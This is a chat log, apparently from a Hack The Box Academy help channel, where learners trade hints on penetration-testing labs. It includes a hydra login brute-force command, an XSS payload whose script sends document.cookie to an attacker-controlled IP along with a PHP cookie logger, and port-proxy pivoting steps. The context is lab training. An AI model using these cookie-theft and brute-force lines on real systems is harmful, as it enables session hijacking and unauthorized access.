but so far every wordlist ive tried has given me the same 3 results and none ended in .203

Keep in mind that if you can perform a zone transfer on that domain then there's no point in brute forcing it as you already know all the hosts there, perhaps there's a subdomain/zone that requires this brute forcing instead?

Hello. I am trying to upload an image of Parrot OS to digital ocean for the VPS setup but when I zip the ISO into a .tz and upload it I do not see the image in my choices list when spinning up a new droplet. I am also trying to feed a URL into the custom image URL input field but this does not seem to work for me either. What am I doing incorrectly?

thanks, i did try to bruteforce against some of the subdomains i found but looks like i missed one

following a new lead now 🤞

🥳 cant believe how long that question took me but i now have an answer

Because subdomains of subdomains my friend

Ah your message didn't load

is there anyone available that could assist me in tunneling with chisel? im still stuck on the pivoting assessment and i think i figured out a way to get to the second machine after the pivot host but i dont think my tunnels are working the way they should

Anyone come from india

What is the deal with this stuff?

VPN connected

one day it works fine, next day it's a coin flip. This has happened enough to start get annoying. Can't hit the box at all, reset the box > same issue. Restart the VM and VPN and such, same problem.

anyone has completed htb Active Directory Enumeration & Attacks module? i have CRTP. should i do this module to escalate my AD Skills? or it covers the same CRTP Content

DM me, I just finished the assessment. Kudos to @acoustic owl for the nudge, when I needed it

ok

10.10.16.0 is your IP so you're trying to ping yourself

Wait I'm dumv

And you've completely changed VPN regions too?

TCP/UDP etc

Yes but only whichever the US based ones. It's totally random it seems. It just started working again half way through the lab.

Hello! Im getting trouble with the final privesc needed on the skills asses of linux privesc module. Someone can help ? Cant reveal much here not to spill any spoilers

Questions about responder box goes in #boxes , in order to access that you need to do ++verify in #bot-commands

This channel is about the modules found at https://academy.hackthebox.com

What is the Website called?

Is it login.php ?

The Admin Panel page is called login.php

And not admin_login.php?

sudo hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 206.189.112.129 -s 31180 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

If have used that

And it worked

^USER^:password is wrong is should be php:username=^USER^&password=^PASS^

The 3 Parameters are divided by :

Not the Elements of the Parameters

Is anyone using Digital ocean for a VPS setup? Can they tell me how they uploaded the img of parrot security to DO?

Did anyone was able to complete the live engagement of the Shells & Payloads module?

I need some help with it

Whats the Problem?

do you think you really need a VPS, whats stopping you from running a local vm?

I am using a VM but figured the lessons were linked somehow 😅

you can continue to do stuff from your VM, there is no need to spend money on VPS if it is not necessarily

The problem is that I understood from the assignment that I need to rdp to the foothold machine, and I figured all the IPs of the hosts that I have to exploit, the problem is for instance how can I go to the browser from the foothold machine?

Thank you for the feedback ❤️

because from the reading, I figured thast I can not attemp to exploit any hosts from my machine, it has to be from the foothold mahcine

Just open firefox in terminal

ohh, never thoght about it. I thought there is no firefox installed on the machine. Thank you bro !

Is this general

No. Follow the directions in #welcome to get there

Hello all, having some trouble with the Attacking SQL Databases Section of the ‘Attacking Common Services’ module.

I found the hash of the user, and tried using both mssqlclient.py and sqsh with domain syntax for both but it doesn’t take…could really use a sanity check 😅

Update: solved it by using my own vm….sqsh doesn’t work in Pwnbox

@sly dirge I used DO for practice once. I used the Debian image they had on it and basically downloaded Parrot on top of it so i never uploaded anything to DO.

Thank you for replying! I will stick to my Parrot VM on top of my Ubuntu install so I do not have to pay for more hardware. Would rather put that money toward more cubes for hacking fun time!

Anyone on that has finished Web Attacks module and can give me a nudge? Feeling really stupid right about now in the skill assessment.

hey guys, do you know who to tell if I found little text mistakes in modules etc.? ty 🙂

You can dm me if you're still working on it

#858470491676737536

Any way to bypass exit(0) in php ?

<?php error_reporting(0); if (isset($_POST['submit'])) { $file_name = urldecode($_FILES['file']['name']); $tmp_path = $_FILES['file']['tmp_name']; if(strpos($file_name, ".jpg") == false){ echo "Invalid file name"; exit(1); } $content = file_get_contents($tmp_path); $all_content = '<?php exit(0);'. $content . '?>'; $handle = fopen($file_name, "w"); fwrite($handle, $all_content); fclose($handle); echo "Done."; } else{ show_source(__FILE__); } ?>

please delete this… you’re spoiling the lab. no lab/challenge is supposed to be easy the point is to struggle and learn from it.

yes that is how you get it however that spoils the entire point of learning it; there is a reason that whenever people ask we give somewhat vague hints such as subdomains of subdomains, and emphasizing words. It's not that we don't care to give them the answer, but people don't learn when they are just handed the answer

this is a field of trial by fire a lot of the times

do things break? yes. do we get frustrated that the skill test isn't exactly like the module example, yes. however the point of the examples is to show the format of how we should be thinking, even if some options may end up being redundant in cases

I think that HTB Academy is going to add an advanced web attack path and doesn’t want to say it. My evidence is all the new tier III and IV stuff most of it seems to be web related and it seems to be stuff that could fit into a path that picks up where big bounty path left off. This is just a conjecture I don’t know for sure. But if I had to guess that’s the guess I would make.

People say it’s unnecessary but I think it’s going to be done or why would they keep adding all this new web stuff? Those of you who do NOT have insider info like me, what do you think?

Im at the module - PIVOTING, TUNNELING, AND PORT FORWARDING, section - Remote/Reverse Port Forwarding with SSH, i followed the steps in the module closely but i cant seem to get a stable reverse shell, it shows many sessions being closed, any help on this?

i 'm sorry! This may be a silly question. Which method is more effective or simpler, web penetration or SQL injection into a website?

@cinder mortar check the payload

hello guys! quick question. do i i have to be on the same network to hack a webserver or a computer using Metasploit-framework?

@rustic sage It depends because if it is on the different network you need to pivot to that network

ok

thank you

You are welcome

@placid quest can i do that in Metasploit as well?

@rustic sage yes

ok thanks

if u still stuck u can dm me

Anyone in here that did the LDAP Enum module? I'm stuck at something, could need a chicken nugget.

Anyone from kerala

India

I feel like a total noob but i'm stuck on a question in the Intro to Network Traffic Analysis.

The question is || What addressing mechanism is used at the Link Layer of the TCP/IP model? ||

Dm me

Hi all! I'm working on Skills Assessment - Service Login module, already got SSH access with harry.potter. When I use hydra I get the following:
[ERROR] Can not create restore file (./hydra.restore) - Permission denied (I don't have access to root at the moment)

You may need to set the handler, check the module again

Hey guys im working on the skills assessment for file inclusion needing a slight hand if possible

can dm me

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload) anyone that can help me with this i have no clue how to do it

how do i encode the request while fuzzing

can I dm anyone on Linux Local Privilege Escalation - Skills Assessment on flag4.txt? thanks in advance

hey guys! im facing some issues with wifi on kali linux live boot. i use a dual band AC 7265. can anyone help?

Hello, I would like to understand the real answer of the last exercise of Linux fundamentals > Filter Contents; I think it might be wrong..? if anybody could explain me, please send me a dm or i could also dm somebody, thx!

Is anyone available for Command Injections SA? I think I'm right there and bypassed most of it, but still no results...

@carmine kiln i have found an issue with file inclusion box with a php command it should be 'cmd' not "cmd" - caused me issues wasnt sure why log poisioning wasnt working till had a good look - not sure who to tell to fix but I know it would effect others

I'll forward it to the academy team

if you post this in #858470491676737536

thanks, I was trying to finalise the assessment and like pulling my hair out about why the script wasnt working, im fairly new to php so didnt realise 😄

ok will do ty

Thanks but im receiving help at the monent

hello, I can't pass the Firewall and IDS/IPS Evasion - Hard Lab section in the Penetration Tester section. I'm stuck on the last question can you help?

you can dm me

you can dm me

please delete this as it contains massive spoilers

you can dm me if you wish for a hint.

hey, im not done with my current module, and would like to start it again . Can i reset it ?

Hi @idle cargo! What is your current directory?

You need to change directory into username-anarchy

go to the end of the module and click Finish. once you're brought to the completion page, you'll see a Retake Module button on the right side.

hi thank you for responding, but currently im not done with the module (havent dont the skill assessment) and i forgot everything so im unable to solve it. Thats why i would like to repeat the whole module 🙂 isnt there any way ?

I don't believe so. you can just go back and reread and don't refer to your notes. you just won't get the satisfaction of clicking submit.

you can also go back to any section though and start up the lab.

okay seems like there is no way around . thats something that could be fixed lol. whatsoever, thx!

it doesn't need to be fixed? you can still start the lab and redo everything you just can't resubmit the question that's already submitted. think of it this way... you have a way of checking your answer when you finish

Hi all! I'm working on Skills Assessment - Service Login module, already got SSH access. Can you someone help me with brute forcing the next user?

you might want to delete the names it's a spoiler. well the first part is

Yes, sure! 😉

there is a provided wordlist use it 🙂

hello,

are we allowed to copy windows tools from the target system to our kali machine ?

I don't see why you would want to.. just compile a new version (if it exists) yourself. all the tools are public

I found the wordlist already, but I don't know target/ IP to specify (ftp / ssh)

try both see what works and what doesn't

I encounter error is some public tools that I downloaded, I just wanna test the tools that is working from the htb labs to my own local practice lab if it will work.

The question is are we allowed ? 🙂

you're probably compiling or downloading them incorrectly. most (if not all) have installation instructions you can follow. to answer your question, I don't know if a rule exists for that or if it's prohibited. I just downloaded and compiled everything myself, which I believe most people do🤷‍♂️

Do I need to use the sed commands to limit the wordlist?

Thanks thanks

why would you do that? just use the wordlist that is provided

Just a wild guess...

do what you learned in the sections 😉

I've tried everything, I'm out of options 😛

you can dm me with: where you are, what you've tried, what you're thinking, potential next steps

patience is important 🙂

Yes, be patient with the second question...

Take a coffee or beer 😛

this might be the wrong field for you then🤷‍♂️

you're going to fail a lot.. this field requires a lot patience and perseverance

the upside is once you find the solution after a long time you'll definitely remember how you did it

speaking of patience. anyone wanna help me on this last flag on pivoting assessment? been on it for 3 days lol. like im so close or at least thats how i feel

Can someone help me with a question.

What security policies can block certain users from running all executables.

did you rdp into the dc?

I must have put it Application Control Policy in like 20 times.

if you're in AD Enum & Attacks there is a section that specifically talks about that. What section is that again?

Intro to active directory.

Digging in deeper

nope thats the part im having issues with. obviously the hash isnt going to be cracked so i cant just sign in. but i feel like i can pth but i m having issues getting a payload on the windows 2 to call back to me

Security in active directory.

to set the autoroute and add it to my socks proxy

ahh I see your issue

think u might be overthinking it

I know its APC. Im looking right at the damn thing and it says exactly what the question is asking for.

not gonna lie. probably

||Copy it exactly how it's presented in the module||

What do you mean?

will say that RDPing into the DC should be simple

@analog tendon what problem are you facing with pivoting

||In the section, the section isn't called Application Control Policy.||

…OH YOU PICKY SON OF A BITCH!!!

should be. i can tell you all that ive tried. which is alot

remove the spoiler please, but yes😂

Hey all, I've been having some issues completing the Shells and Payloads module and figured I should reach out here. I completed all of the boxes in the live engagement besides the second one, and keep getting this error when I try to use the metasploit module:

getting into the DC. i have portfwd set with my metasploit and have a payload on the windows2 machine but payload doesnt reach me. ive used netsh to portproxy to attempt to rdp that way but it wouldnt reach

guys i need urgent help please if anyone can

https://dontasktoask.com/

no like

i need help

real help

I'm trying to finish a module up right now, but if you want to dm me I can try to assist on the side. if no one else is available

@analog tendon did you dump the lsass

iirc this is the pivot map..
||start -> 1st pivot (w/ tunneling) -> 2nd (credentialed) -> 3rd -> DC||
big spoiler: ||you only need to tunnel once||

if i cant figure it out here soon then yes i might

i did

@analog tendon did you use netsh to connect to another machine

i figured. but i cant crack V's hash and had to use pth to rdp into windows 2. figured its the same for DC

i set the netsh port proxy so when i attempt to use xfreerdp itll forward to the DC but it wouldnt connect

How @analog tendon

i set the port proxy has v4tov4 listeningport=4444 listeningaddress= <windows2iphere> connectingport=3389 connectingaddress<DCiphere>

wish i could check my notes rn

sorry

its ok

but i will say attempting to rdp it gives me the whole machine is unable to connect error saying the machine is turned off or not available on the network

when doing it through the windows 2 machine

can some1 help me with WEB SERIVCE & API ATTACKS SKILL ASSESSMENT

So I'm doing the Web shell module with laudanum and the question asks for the full path to the laudanum apsx shell on pwnbox and I enter /usr/share/laudanum/aspx and variations of it and it won't accept the answer, tried capitals as well as including shell.aspx but it won't have it?

alright fellas huge shout out to @placid quest @river skiff and @dim wolf for all the assistance on this. Turns out that I am a dumbass that doesnt fully read through lsass dumps to make my life easier. they are the GOAT's

Has someone done the XSS Module
Module:CROSS-SITE SCRIPTING(XSS), Session Hacking
It does call the Script.js but it doesnt call index.php
Target: 10.129.210.184
Attacker: 10.10.15.187

Listener:
sudo php -S 0.0.0.0:8080
Payload:
"><script src=http://10.10.15.187:8080/script.js/></script>
Script.js:
new Image().src='http://10.10.15.187/index.php?c='+document.cookie;
index.php:
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['10.129.210.184']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>

its calling the index.php. but you werent supposed to put an ip address within the [ ]

But where do i need to put the Ip of the target?

you dont. the .js script is supposed to run and be called by the victim which then run its php script to see the cookies and show them on the php server you started

youre meant to just copy and paste it as the php script

And the script.js then calls the Victim IP?

the victim calls the script.js so no need to get their IP youll get it when the script is done running

Disregard my post turns out it wanted one of the many places you can find the damn thing

Thanks

nvm i got it

Are you sure you have two http listeners, e.g. one on port 8080 for script.js and one on port 80 for index.php?

Greetings, I’m working on the skills assessment for Intro to Windows Command Line Module and I cannot SSH the first two users, user0 and user1. I am aware that the flag for the previous user is the password for the next and the flag is provided on the banner when SSH’ing into user0’s. However, this password does not work for user1. I’ve tried both SSH and RDP. On the RDP session I receive an error saying password expired. Additionally, using the given password for user0 also does not work. Both passwords contain an exclamation mark (!). I’ve tired escaping it with a backslash in front or using single quotations on the whole password, still to no avail. Any thoughts?

Can anyone give me a nudge on File Upload module Skill Assessment section? Got really stuck for days

you can dm me with: where you are, what you've tried, potential next steps.

sure, thanks

@balmy spear I am still stuck on that

I was finally able to login to user0 on the very 1st try after switching the vpn to tcp. But after opening a second ssh terminal the password doesn't work. Additionally, when trying to execute a powershell terminal as user1 I get and error saying Account restrictions are preventing this user from signing in so I'm not sure what the issue is.

@balmy spear me too because i checked with cme, but there no password that was working

If anyone is around to go over this sometime soon, I'd really appreciate it

Hello, I’m doing the Intro do Assembly Language module and I’m stuck on a question about the data movement, I asks to add a line at the end of a nasm file to have the value of “rsp” on “rax”; I tried with bot “mov” and “lea” but all the answers I give seem to be wrong, can somebody help me out a bit?

the pass for user1 should be the flag on the banner for the ssh correct? at least that's how I understood the instructions.

@balmy spear Yes but still the flag is not working as the password

agreed

. @balmy spear may be @fading pythonNo has done the module

@balmy spear i'll help please propvide url

i'e done every module so if anyone needs help let me know

https://academy.hackthebox.com/module/167/section/1633

@bold jackal pm me

use -Pn

if that doesnt work pm me

Badly need a nudge on Shells & Payloads - Live engagement first box : <

@fierce island what section

like url pleas

https://academy.hackthebox.com/module/115/section/1139

when i use -Pn it words as the host shows up, but the prot doesn,t appear at all. All the connections are perfect (internet, vpn, etc) sometimes it works fine sometimes it doesn,t.

well if you are 100% sure of that then all you can do is reset machine and vpn

i kept doing that for the past 2 hours lol. at the top right it says all 3 connections are green. (Machine, Starting point, Socket). do you think it could be something else?

Got a nudge to give?

give me a few minute @fierce island i got plenty of nudges to give but im helping someone else real quick

Can I also get a little nudge?

Bruh, you can't use starting-point VPN for module content... If this is about the #starting-point box go do ++verify in #bot-commands

whats that (++verify) ? pleased and thank you

It's a command... Read #welcome

appreciate it Mr Hacker

Do u mind if i dm you with WINDOWS PRIVILEGE ESCALATION ?

Need a nudge on the same module, second box though

Well would you care to nudge me on the first box while you wait for one?

Sounds good, where are you stuck?

What are you up to on the first box?

DM to keep it spoilerfree?

Sounds good

I've got an issue with using crackmapexec in the Attacking Common Services / Attacking SMB section. When I run the command against the user jason, I get a response that all of the passwords are correct. Has anyone seen that before?

all of the passwords are correct?

Yes, it shows every one of them are correct. Obviously they're not.

then wouldnt everyone have seen that before?

Right, that's why I'm asking. It's very odd.

I've even restarted the instance and my VM.

It does happen

obfuscating things to make you think isnt odd

It's basically bruteforce protection

congrats marcie you found the key to my heart

congrats jp3g you found the key to my heart

Ew, take it back

congrats bram you found the key to my heart

you can throw it away, no problem 👍🏾

hey all, im stuck on "Intro to Active Directory" question: What uniquely identifies a Service instance? (full name, space-seperated, not abbreviated). I thought the answer was ||Service Principle Name ||but that's not working, and i tried it upper, lower case as well. The hint was ||It is used by Kerberos to associate an instance of a service with a logon account.||

what the- what is this?

obfuscation

how do you know me?

i dont know you

😕

i saw you typing. look down V

keep the channel on topic @rustic sage

we are on topic

anyways im fairly confident my answer is correct for this question, but is there a way to check what answer it is expecting? like a solutions page or something?

isnt there a hint button?

there is

and it points to the same answer i typed

Hey, can someone explain to me how / where to find the number of zones that exist on a nameserver. In particular I am doing the Information Gathering / Active Subdomain Enumerationmodule and I got lucky at the second question. But I still don't understand how exactly I should have gotten the right answer. I used dig and nslookup (||axfr||) but I don't know where I can find the number of zones then.

put "the" in front of it?

A Service Principal Name (SPN) uniquely identifies a service instance. They are used by Kerberos authentication to associate an instance of a service with a logon account, allowing a client application to request the service to authenticate an account without needing to know the account name.

||You're right but do you have trialing or leading whitespaces?||

where can i link my academy profile to here? im not making a normal htb account

rip this didnt work but it was a good idea

this obviously isnt the channel to ask this but i have no other option

only silver annual subscribers can link their accounts for now

marginally lame. ill stay away untill i can answer modules more successfully

no trailing or leading whitespace

dm me

done

one last thing before i go: there is no like #server-feedback. there is no "normie general". i am an academy user and id like to discuss htb acaxdemy but this is quite literally the only channel available to me to talk in. :???: have a good day sorry for being a boob

you can create an account on the main platform and verify it, usually it takes like not more than 5 minutes

Okay, even using the --no-brute-force option in crackmapexec, I still get the same response that all passwords are correct. Any ideas on this one?

anyone free for web attacks skill assessment? ||I'm at the very last step just have trouble getting the flag||

you can dm me where you're stuck and what you have tried

@sterile hawk

why arent mods pingable

@teal mountains

sorry moderator

@carmine kilnmaybe a panda is more online then like

Can any one help me with Intro to Bash scripting?

get the f outta here

SCAM ALERT

I figured out my issue. Metasploit is your friend!

Hello all, on the Attacking RDP section of the Attacking Common Services module…I’m a bit confused on the last question…I assumed it was supposed to be a RDP session hijack, but I couldn’t find any other users when running ‘query user’. Also, couldn’t dump the SAM file due to lack of permissions…was wondering if I could get a nudge?

Is anyone able to help me understand why the first ncrack command I ran did not work, while the second seemingly did??

tried to omit some of the output. basically the user is in username.txt file but won't discover it...

but if the user is explicitly set, it works fine.

Don't use ./

use ~/<file>

or /path/to/file

going to try that now. is this just a ncrack thing? I am confident i've done that before with things like hydra and crackmap successfully.

in any case, I am running that now. thanks for the tip

Not exactly sure. ./ usually means you're trying to execute something not refence it. I could be wrong but that's just what I found on the man page

Example: ncrack dicom://127.0.0.1 -U aet.txt --pass DOESNOTMATTER

The above is also from the man page

how did you bypass email validation for the payload?

Hello every one, I am stuck in the lab of HTTP Attacks https://academy.hackthebox.com/module/191/section/2056 y was able to make XSS injection but i dont recive any connections from the admin account to steal the cookie, even if i just put the url of my machine. Something is not working in the lab? or am I missing something? Help please

Need help with user hash using secretsdump ... I retrieved the SAM, SYSTEM, and SECRUTIY files from the backup drive but when I run it through secretsdump I get this error: "read length must be non-negative or -1" how do i resolve this?

what did you use to get it working?

Look into how /drive: works for the xfreerdp command

When passing files through a command ./ Refers to the current directory, ~/ refers to home. It does not mean it's trying to execute something. However some commands do break without absolute paths, I would look into how it's expecting to receive files. Generally though you would pass a single file in the current directory by just putting the filename, not needing the ./ Unless you're trying to move through nearby directories

i have 40 cubes. i was trying to unlock tier 0 modules but it's not working. please help

It seems you have completed the Windows Priv Escalation module ... I want to ask about the pillaging section where we need to get the admin hash but after retrieving the SAM SECURITY and SYSTEM files from the backup drive, the impacket-secretsdump didnt work at all. Just wanted to know if I am on the right track or missing something

there were 4 backups and I used ftp to get them to my machine ... transfered bytes seemed correct (didn't check the md5 though) but somehow all three backups gave me error with samdump2 and impacket-secretsdump ... well at least I know the issue is not with what i know

Hi Guys, I've been struggling for a while with the Skills Assessment - Web Fuzzing, Q3 (One of the pages you will identify should say 'You don't have access!' What is the full page URL?
This is the command I'm using now ||ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u 'http://archive.academy.htb:31455/FUZZ , http://faculty.academy.htb:31455/FUZZ , http://test.academy.htb:31455/FUZZ' -recursion -recursion-depth 3 -e ' .php,.phps,.php7 ' -v -fs '0,1'||
I tried changing the filter to only 200 status code, no filter and tried with no luck

I have the same issue 😣 I can’t tell whether it’s me or the network or whatever. Have been trying many hours.
As you experience the same thing, maybe it is not my fault after all 😅

I have completed the first two Nibbles quests last month and got in. Had to take a break and now it just doesn’t work anymore for the last part 🙁

chisel

HI
I'm stuck on the part II of AD assessment.

I got a foothold in MS01 and SQL01.
I got credentials on SQL01.
I can't find a way to get the admin flag from MS01.

With bloodhound I found the user who has generic all rights but I don't know how to get his hash.

mhm..I must be doing something wrong. I found courses directory inside faculty subdomain and that's all from useful stuff. By changing filters i found a bunch of forbidden pages. I also tried regex match. Tried doing one subdomain at a time too

Anyone done the BloodHound Module and is willing to give me a nudge for the last question of the skills assessement?

are you talking about the pwnbox? also... yeah every module is doable from your own vm via the vpn tunnel...

ah so i am misunderstanding you. Also this may reflect real world; sometimes when you rdp into a machine you may not get the best performance. Some may be from your own machine others may be just due to the system itself. Usually why it's recommended to wait a few minutes after spawning a machine to try and mess with it

Hello. I just made an annual silver subscription.

Hey all, for attacking common applications its showing us how to use eyewtiness at the start, but the active machine(IP) is only running port 80 with nothing on it, is this just a demonstration or are we to follow, if we are then where are these services :S

Hello! I`m working with the meterpreter tunneling but I'm stuck with the autorute command 😦

Any idea on why I`m getting this error 😦

Do you have an active session already

I`m going thruough that but in the notes this is the first step...

Ohhh yeah I have Session 1 created and running

what is before that, you must have some istruction

there you go

But then why it gives me the error if the session is created and running...

right. so this was a previous screenshot

it`s not working now anyways 😦 😦

it died?

what module is this called

within pivoting

no it`s running 😦

Meterpreter Tunneling & Port Forwarding

thats why

Meterpreter Tunneling & Port Forwarding

I should kill the session?!

i would recommend start from the start

and go through it all command by command

it can't route if there is nothing to route through

your routing through that session 1 which is your pivoting target

make sense?

I`m processing it hahahah wait

so that session 1

your trying to auto route

I just finished the ping sweep

go back and get a live meterpreter session

Meterpreter Session Establishment

you have to set the session value to the value of your actual meterpreter session so if it's session 10 you need to set it to 10 :) but yeah the tunneling one really walks you through everything

Currently looking at the Linux Privilege Escalation module. Regarding the LD_PRELOAD method I was wondering whether it is always possible to escalate privileges as long as there is at least one sudo program present which imports at least one dynamically shared library (.so). Is it true or do you know cases how this is prevented?

Go back where?

literally just redo that section from top to bottom